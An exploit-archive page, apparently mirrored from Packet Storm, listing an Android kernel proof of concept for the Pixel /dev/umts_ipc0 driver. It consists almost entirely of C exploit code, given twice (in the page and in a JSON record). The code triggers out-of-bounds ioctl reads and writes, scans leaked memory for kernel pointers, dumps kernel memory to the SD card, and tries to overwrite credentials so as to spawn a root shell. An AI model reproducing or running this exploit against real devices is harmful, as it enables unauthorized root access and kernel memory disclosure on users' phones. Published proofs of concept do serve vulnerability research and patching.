📄 Android Kernel /dev/umts_ipc0 Out-Of-Bounds Read / Write_PACKETSTORM:223848

Description

Proof of concept exploit targeting a vulnerability in an Android kernel driver related to GNSS/UMTS IPC /dev/umtsipc0...

Visit Original Source

Basic Information

ID PACKETSTORM:223848

Published Jun 19, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Android Kernel Exploit OOB Read/Write via /dev/umts_ipc0 |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : Google Pixel CPIF Driver |
==================================================================================================================================

[+] Summary : exploit targeting a suspected vulnerability in an Android kernel driver related to GNSS/UMTS IPC (/dev/umts_ipc0).
It attempts to abuse out-of-bounds (OOB) read and write conditions through ioctl interfaces (IOCTL_LOAD_GNSS_IMAGE and IOCTL_READ_GNSS_IMAGE).

[+] Payload :

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <errno.h>
#include <stdint.h>
#include <inttypes.h>
#include <signal.h>
#include <setjmp.h>

#define UMTS_IPC0_DEVICE "/dev/umts_ipc0"
#define IOCTL_LOAD_GNSS_IMAGE 0xC0204901
#define IOCTL_READ_GNSS_IMAGE 0xC0204902
struct gnss_image {
uint64_t offset;
uint64_t firmware_size;
void *firmware_bin;
};
struct gnss_image_read {
uint64_t offset;
uint64_t size;
void *buffer;
};

#define GNSS_V_BASE 0xffffffc091e00000ULL
#define GNSS_BUFFER_SIZE 0x00100000
#define CURRENT_TASK_OFFSET 0x0004f000
#define RADIO_GID 1001
static int fd;
static sigjmp_buf jmpbuf;
static volatile int fault_triggered = 0;
static void sigsegv_handler(int sig) {
printf("[!] Segmentation fault caught\n");
fault_triggered = 1;
siglongjmp(jmpbuf, 1);
}
static void init_signals(void) {
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = sigsegv_handler;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
static int check_privileges(void) {
uid_t uid = getuid();
gid_t gid = getgid();
printf("[*] Current UID: %d, GID: %d\n", uid, gid);
printf("[*] Effective UID: %d, GID: %d\n", geteuid(), getegid());

if (uid == 0) {
printf("[!] Already root!\n");
return 1;
}
if (gid == RADIO_GID || getegid() == RADIO_GID) {
printf("[+] Running in radio context (u:r:radio:s0)\n");
return 1;
}
printf("[-] Not in radio context.\n");
printf("[*] Try: su -c 'chown radio:radio %s'\n", __FILE__);
return 0;
}
static int trigger_oob_write(uint64_t offset, uint64_t size, void *data) {
struct gnss_image img;
int ret;
printf("[*] Triggering OOB write:\n");
printf(" Offset: 0x%llx\n", offset);
printf(" Size: 0x%llx (%llu bytes)\n", size, size);
memset(&img, 0, sizeof(img));
img.offset = offset;
img.firmware_size = size;
img.firmware_bin = data;
if (sigsetjmp(jmpbuf, 1) == 0) {
ret = ioctl(fd, IOCTL_LOAD_GNSS_IMAGE, &img);
if (ret < 0) {
perror("ioctl(LOAD_GNSS_IMAGE)");
return -1;
}
} else {
printf("[!] Fault triggered during OOB write\n");
return -1;
}
return ret;
}
static int trigger_oob_read(uint64_t offset, uint64_t size, void *buffer) {
struct gnss_image_read img_read;
int ret;
printf("[*] Triggering OOB read:\n");
printf(" Offset: 0x%llx\n", offset);
printf(" Size: 0x%llx (%llu bytes)\n", size, size);
memset(&img_read, 0, sizeof(img_read));
img_read.offset = offset;
img_read.size = size;
img_read.buffer = buffer;
if (sigsetjmp(jmpbuf, 1) == 0) {
ret = ioctl(fd, IOCTL_READ_GNSS_IMAGE, &img_read);
if (ret < 0) {
perror("ioctl(READ_GNSS_IMAGE)");
return -1;
}
} else {
printf("[!] Fault triggered during OOB read\n");
return -1;
}
return ret;
}
static void exploit_oob_write(void) {
const size_t payload_size = 0x1000;
void *payload;
int ret;
printf("\n[!] Starting OOB write exploit...\n");
payload = mmap(NULL, payload_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (payload == MAP_FAILED) {
perror("mmap");
return;
}
printf("[*] Crafting payload with pattern 0x41414141...\n");
uint64_t *p = (uint64_t *)payload;
for (size_t i = 0; i < payload_size / sizeof(uint64_t); i++) {
p[i] = 0x4141414141414141ULL | (i & 0xFFFF);
}
uint64_t offsets[] = {
0x0000, // Beginning of buffer
0x4f000, // Known vulnerable offset from panic
0x100000, // End of buffer
0x200000, // Beyond buffer
};
for (size_t i = 0; i < sizeof(offsets)/sizeof(offsets[0]); i++) {
printf("\n[*] Attempt %zu: offset 0x%llx\n", i+1, offsets[i]);
ret = trigger_oob_write(offsets[i], payload_size, payload);
if (ret == 0) {
printf("[+] OOB write succeeded at offset 0x%llx\n", offsets[i]);
printf("[*] Checking for system impact...\n");
break;
}
}
munmap(payload, payload_size);
}
static void exploit_oob_read(void) {
const size_t read_size = 0x1000;
void *buffer;
int ret;
printf("\n[!] Starting OOB read exploit...\n");
buffer = malloc(read_size);
if (!buffer) {
perror("malloc");
return;
}
uint64_t offsets[] = {
0x0000,
0x4f000,
0x80000,
0xff000,
};
for (size_t i = 0; i < sizeof(offsets)/sizeof(offsets[0]); i++) {
printf("\n[*] Attempt %zu: reading at offset 0x%llx\n", i+1, offsets[i]);
memset(buffer, 0, read_size);
ret = trigger_oob_read(offsets[i], read_size, buffer);
if (ret == 0) {
printf("[+] OOB read succeeded at offset 0x%llx\n", offsets[i]);
printf("[*] First 64 bytes of leaked data:\n");
for (size_t j = 0; j < 64 && j < read_size; j++) {
printf("%02x ", ((uint8_t *)buffer)[j]);
if ((j + 1) % 16 == 0) printf("\n");
}
printf("\n");
uint64_t *ptr_data = (uint64_t *)buffer;
int found = 0;
for (size_t j = 0; j < read_size / sizeof(uint64_t); j++) {
uint64_t val = ptr_data[j];
if (val > 0xffffff8000000000ULL && val < 0xffffffc000000000ULL) {
printf("[+] Found kernel pointer at offset 0x%zx: 0x%016llx\n",
j * sizeof(uint64_t), val);
found++;
}
}
if (!found) {
printf("[*] No kernel pointers found in this range\n");
}
}
}
free(buffer);
}
static void exploit_escalate(void) {
const size_t payload_size = 0x1000;
void *payload;
printf("\n[!] Attempting privilege escalation...\n");
payload = mmap(NULL, payload_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (payload == MAP_FAILED) {
perror("mmap");
return;
}
struct {
uint64_t uid;
uint64_t gid;
uint64_t euid;
uint64_t egid;
uint64_t suid;
uint64_t sgid;
} *creds = (void *)payload;
creds->uid = 0;
creds->gid = 0;
creds->euid = 0;
creds->egid = 0;
creds->suid = 0;
creds->sgid = 0;
printf("[*] Attempting to overwrite credentials at offset 0x%llx\n",
CURRENT_TASK_OFFSET);
trigger_oob_write(CURRENT_TASK_OFFSET, payload_size, payload);
if (getuid() == 0) {
printf("[+] SUCCESS! Got root!\n");
printf("[*] Spawning root shell...\n");
system("/system/bin/sh");
} else {
printf("[-] Escalation failed. Still UID: %d\n", getuid());
}
munmap(payload, payload_size);
}
static void dump_kernel_range(uint64_t start, size_t size) {
void *buffer = malloc(size);
if (!buffer) {
perror("malloc");
return;
}
printf("[*] Dumping kernel memory from 0x%llx, size 0x%zx\n", start, size);
if (trigger_oob_read(start, size, buffer) == 0) {
printf("[+] Dump successful\n");

/* Save to file */
FILE *f = fopen("/sdcard/kernel_dump.bin", "wb");
if (f) {
fwrite(buffer, 1, size, f);
fclose(f);
printf("[+] Saved to /sdcard/kernel_dump.bin\n");
}
}

free(buffer);
}
int main(int argc, char **argv) {
int mode = 0; // 0 = write, 1 = read, 2 = escalate, 3 = dump
printf("=========================================\n");
printf("Android Kernel Exploit - CVE-2026-XXXXX\n");
printf("Google Pixel /dev/umts_ipc0\n");
printf("Credit: Jann Horn, Seth Jenkins\n");
printf("=========================================\n\n");
/* Parse arguments */
if (argc > 1) {
if (strcmp(argv[1], "write") == 0) mode = 0;
else if (strcmp(argv[1], "read") == 0) mode = 1;
else if (strcmp(argv[1], "escalate") == 0) mode = 2;
else if (strcmp(argv[1], "dump") == 0) mode = 3;
else {
printf("Usage: %s [write|read|escalate|dump]\n", argv[0]);
return 1;
}
}
if (!check_privileges()) {
printf("[-] Need radio context to exploit\n");
return 1;
}
fd = open(UMTS_IPC0_DEVICE, O_RDWR);
if (fd < 0) {
perror("open(/dev/umts_ipc0)");
return 1;
}
printf("[+] Device opened successfully (fd=%d)\n", fd);
init_signals();
switch (mode) {
case 0:
exploit_oob_write();
break;
case 1:
exploit_oob_read();
break;
case 2:
exploit_escalate();
break;
case 3:
dump_kernel_range(GNSS_V_BASE, GNSS_BUFFER_SIZE * 2);
break;
default:
printf("[*] Running both OOB write and read...\n");
exploit_oob_write();
exploit_oob_read();
}
close(fd);
printf("\n[+] Exploit complete\n");

return 0;
}

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-20T03:57:33",
    "description": "Proof of concept exploit targeting a vulnerability in an Android kernel driver related to GNSS/UMTS IPC /dev/umtsipc0...",
    "published": "2026-06-19T00:00:00",
    "modified": "2026-06-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Android Kernel /dev/umts_ipc0 Out-Of-Bounds Read / Write",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:223848",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : Android Kernel Exploit OOB Read/Write via /dev/umts_ipc0                                                         |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |\n    | # Vendor    : Google Pixel CPIF Driver                                                                                         |\n    ==================================================================================================================================\n    \n    [+] Summary    : exploit targeting a suspected vulnerability in an Android kernel driver related to GNSS/UMTS IPC (/dev/umts_ipc0). \n                     It attempts to abuse out-of-bounds (OOB) read and write conditions through ioctl interfaces (IOCTL_LOAD_GNSS_IMAGE and IOCTL_READ_GNSS_IMAGE).\n    \n    [+] Payload    : \n    \n    #define _GNU_SOURCE\n    #include <stdio.h>\n    #include <stdlib.h>\n    #include <string.h>\n    #include <unistd.h>\n    #include <fcntl.h>\n    #include <sys/ioctl.h>\n    #include <sys/mman.h>\n    #include <sys/socket.h>\n    #include <errno.h>\n    #include <stdint.h>\n    #include <inttypes.h>\n    #include <signal.h>\n    #include <setjmp.h>\n    \n    #define UMTS_IPC0_DEVICE \"/dev/umts_ipc0\"\n    #define IOCTL_LOAD_GNSS_IMAGE  0xC0204901\n    #define IOCTL_READ_GNSS_IMAGE  0xC0204902\n    struct gnss_image {\n        uint64_t offset;\n        uint64_t firmware_size;\n        void *firmware_bin;\n    };\n    struct gnss_image_read {\n        uint64_t offset;\n        uint64_t size;\n        void *buffer;\n    };\n    \n    #define GNSS_V_BASE          0xffffffc091e00000ULL\n    #define GNSS_BUFFER_SIZE     0x00100000\n    #define CURRENT_TASK_OFFSET  0x0004f000  \n    #define RADIO_GID            1001\n    static int fd;\n    static sigjmp_buf jmpbuf;\n    static volatile int fault_triggered = 0;\n    static void sigsegv_handler(int sig) {\n        printf(\"[!] Segmentation fault caught\\n\");\n        fault_triggered = 1;\n        siglongjmp(jmpbuf, 1);\n    }\n    static void init_signals(void) {\n        struct sigaction sa;\n        memset(&sa, 0, sizeof(sa));\n        sa.sa_handler = sigsegv_handler;\n        sigaction(SIGSEGV, &sa, NULL);\n        sigaction(SIGBUS, &sa, NULL);\n    }\n    static int check_privileges(void) {\n        uid_t uid = getuid();\n        gid_t gid = getgid();\n        printf(\"[*] Current UID: %d, GID: %d\\n\", uid, gid);\n        printf(\"[*] Effective UID: %d, GID: %d\\n\", geteuid(), getegid());\n        \n        if (uid == 0) {\n            printf(\"[!] Already root!\\n\");\n            return 1;\n        }\n        if (gid == RADIO_GID || getegid() == RADIO_GID) {\n            printf(\"[+] Running in radio context (u:r:radio:s0)\\n\");\n            return 1;\n        }\n        printf(\"[-] Not in radio context.\\n\");\n        printf(\"[*] Try: su -c 'chown radio:radio %s'\\n\", __FILE__);\n        return 0;\n    }\n    static int trigger_oob_write(uint64_t offset, uint64_t size, void *data) {\n        struct gnss_image img;\n        int ret;\n        printf(\"[*] Triggering OOB write:\\n\");\n        printf(\"    Offset: 0x%llx\\n\", offset);\n        printf(\"    Size:   0x%llx (%llu bytes)\\n\", size, size);\n        memset(&img, 0, sizeof(img));\n        img.offset = offset;\n        img.firmware_size = size;\n        img.firmware_bin = data;\n        if (sigsetjmp(jmpbuf, 1) == 0) {\n            ret = ioctl(fd, IOCTL_LOAD_GNSS_IMAGE, &img);\n            if (ret < 0) {\n                perror(\"ioctl(LOAD_GNSS_IMAGE)\");\n                return -1;\n            }\n        } else {\n            printf(\"[!] Fault triggered during OOB write\\n\");\n            return -1;\n        }\n        return ret;\n    }\n    static int trigger_oob_read(uint64_t offset, uint64_t size, void *buffer) {\n        struct gnss_image_read img_read;\n        int ret;\n        printf(\"[*] Triggering OOB read:\\n\");\n        printf(\"    Offset: 0x%llx\\n\", offset);\n        printf(\"    Size:   0x%llx (%llu bytes)\\n\", size, size);\n        memset(&img_read, 0, sizeof(img_read));\n        img_read.offset = offset;\n        img_read.size = size;\n        img_read.buffer = buffer;\n        if (sigsetjmp(jmpbuf, 1) == 0) {\n            ret = ioctl(fd, IOCTL_READ_GNSS_IMAGE, &img_read);\n            if (ret < 0) {\n                perror(\"ioctl(READ_GNSS_IMAGE)\");\n                return -1;\n            }\n        } else {\n            printf(\"[!] Fault triggered during OOB read\\n\");\n            return -1;\n        }\n        return ret;\n    }\n    static void exploit_oob_write(void) {\n        const size_t payload_size = 0x1000;\n        void *payload;\n        int ret;\n        printf(\"\\n[!] Starting OOB write exploit...\\n\");\n        payload = mmap(NULL, payload_size, PROT_READ | PROT_WRITE,\n                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n        if (payload == MAP_FAILED) {\n            perror(\"mmap\");\n            return;\n        }\n        printf(\"[*] Crafting payload with pattern 0x41414141...\\n\");\n        uint64_t *p = (uint64_t *)payload;\n        for (size_t i = 0; i < payload_size / sizeof(uint64_t); i++) {\n            p[i] = 0x4141414141414141ULL | (i & 0xFFFF);\n        }\n        uint64_t offsets[] = {\n            0x0000,      // Beginning of buffer\n            0x4f000,     // Known vulnerable offset from panic\n            0x100000,    // End of buffer\n            0x200000,    // Beyond buffer\n        };\n        for (size_t i = 0; i < sizeof(offsets)/sizeof(offsets[0]); i++) {\n            printf(\"\\n[*] Attempt %zu: offset 0x%llx\\n\", i+1, offsets[i]);\n            ret = trigger_oob_write(offsets[i], payload_size, payload);\n            if (ret == 0) {\n                printf(\"[+] OOB write succeeded at offset 0x%llx\\n\", offsets[i]);\n                printf(\"[*] Checking for system impact...\\n\");\n                break;\n            }\n        }\n        munmap(payload, payload_size);\n    }\n    static void exploit_oob_read(void) {\n        const size_t read_size = 0x1000;\n        void *buffer;\n        int ret;\n        printf(\"\\n[!] Starting OOB read exploit...\\n\");\n        buffer = malloc(read_size);\n        if (!buffer) {\n            perror(\"malloc\");\n            return;\n        }\n        uint64_t offsets[] = {\n            0x0000,     \n            0x4f000,    \n            0x80000,   \n            0xff000,    \n        };\n        for (size_t i = 0; i < sizeof(offsets)/sizeof(offsets[0]); i++) {\n            printf(\"\\n[*] Attempt %zu: reading at offset 0x%llx\\n\", i+1, offsets[i]);\n            memset(buffer, 0, read_size);\n            ret = trigger_oob_read(offsets[i], read_size, buffer);\n            if (ret == 0) {\n                printf(\"[+] OOB read succeeded at offset 0x%llx\\n\", offsets[i]);\n                printf(\"[*] First 64 bytes of leaked data:\\n\");\n                for (size_t j = 0; j < 64 && j < read_size; j++) {\n                    printf(\"%02x \", ((uint8_t *)buffer)[j]);\n                    if ((j + 1) % 16 == 0) printf(\"\\n\");\n                }\n                printf(\"\\n\");\n                uint64_t *ptr_data = (uint64_t *)buffer;\n                int found = 0;\n                for (size_t j = 0; j < read_size / sizeof(uint64_t); j++) {\n                    uint64_t val = ptr_data[j];\n                    if (val > 0xffffff8000000000ULL && val < 0xffffffc000000000ULL) {\n                        printf(\"[+] Found kernel pointer at offset 0x%zx: 0x%016llx\\n\",\n                               j * sizeof(uint64_t), val);\n                        found++;\n                    }\n                }\n                if (!found) {\n                    printf(\"[*] No kernel pointers found in this range\\n\");\n                }\n            }\n        }\n        free(buffer);\n    }\n    static void exploit_escalate(void) {\n        const size_t payload_size = 0x1000;\n        void *payload;\n        printf(\"\\n[!] Attempting privilege escalation...\\n\");\n        payload = mmap(NULL, payload_size, PROT_READ | PROT_WRITE,\n                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n        if (payload == MAP_FAILED) {\n            perror(\"mmap\");\n            return;\n        }\n        struct {\n            uint64_t uid;\n            uint64_t gid;\n            uint64_t euid;\n            uint64_t egid;\n            uint64_t suid;\n            uint64_t sgid;\n        } *creds = (void *)payload;\n        creds->uid = 0;\n        creds->gid = 0;\n        creds->euid = 0;\n        creds->egid = 0;\n        creds->suid = 0;\n        creds->sgid = 0;\n        printf(\"[*] Attempting to overwrite credentials at offset 0x%llx\\n\",\n               CURRENT_TASK_OFFSET);\n        trigger_oob_write(CURRENT_TASK_OFFSET, payload_size, payload);\n        if (getuid() == 0) {\n            printf(\"[+] SUCCESS! Got root!\\n\");\n            printf(\"[*] Spawning root shell...\\n\");\n            system(\"/system/bin/sh\");\n        } else {\n            printf(\"[-] Escalation failed. Still UID: %d\\n\", getuid());\n        }\n        munmap(payload, payload_size);\n    }\n    static void dump_kernel_range(uint64_t start, size_t size) {\n        void *buffer = malloc(size);\n        if (!buffer) {\n            perror(\"malloc\");\n            return;\n        }\n        printf(\"[*] Dumping kernel memory from 0x%llx, size 0x%zx\\n\", start, size);\n        if (trigger_oob_read(start, size, buffer) == 0) {\n            printf(\"[+] Dump successful\\n\");\n            \n            /* Save to file */\n            FILE *f = fopen(\"/sdcard/kernel_dump.bin\", \"wb\");\n            if (f) {\n                fwrite(buffer, 1, size, f);\n                fclose(f);\n                printf(\"[+] Saved to /sdcard/kernel_dump.bin\\n\");\n            }\n        }\n        \n        free(buffer);\n    }\n    int main(int argc, char **argv) {\n        int mode = 0; // 0 = write, 1 = read, 2 = escalate, 3 = dump\n        printf(\"=========================================\\n\");\n        printf(\"Android Kernel Exploit - CVE-2026-XXXXX\\n\");\n        printf(\"Google Pixel /dev/umts_ipc0\\n\");\n        printf(\"Credit: Jann Horn, Seth Jenkins\\n\");\n        printf(\"=========================================\\n\\n\");\n        /* Parse arguments */\n        if (argc > 1) {\n            if (strcmp(argv[1], \"write\") == 0) mode = 0;\n            else if (strcmp(argv[1], \"read\") == 0) mode = 1;\n            else if (strcmp(argv[1], \"escalate\") == 0) mode = 2;\n            else if (strcmp(argv[1], \"dump\") == 0) mode = 3;\n            else {\n                printf(\"Usage: %s [write|read|escalate|dump]\\n\", argv[0]);\n                return 1;\n            }\n        }\n        if (!check_privileges()) {\n            printf(\"[-] Need radio context to exploit\\n\");\n            return 1;\n        }\n        fd = open(UMTS_IPC0_DEVICE, O_RDWR);\n        if (fd < 0) {\n            perror(\"open(/dev/umts_ipc0)\");\n            return 1;\n        }\n        printf(\"[+] Device opened successfully (fd=%d)\\n\", fd);\n        init_signals();\n        switch (mode) {\n            case 0:\n                exploit_oob_write();\n                break;\n            case 1:\n                exploit_oob_read();\n                break;\n            case 2:\n                exploit_escalate();\n                break;\n            case 3:\n                dump_kernel_range(GNSS_V_BASE, GNSS_BUFFER_SIZE * 2);\n                break;\n            default:\n                printf(\"[*] Running both OOB write and read...\\n\");\n                exploit_oob_write();\n                exploit_oob_read();\n        }\n        close(fd);\n        printf(\"\\n[+] Exploit complete\\n\");\n        \n        return 0;\n    }\n    \t\t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/223848",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/223848/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply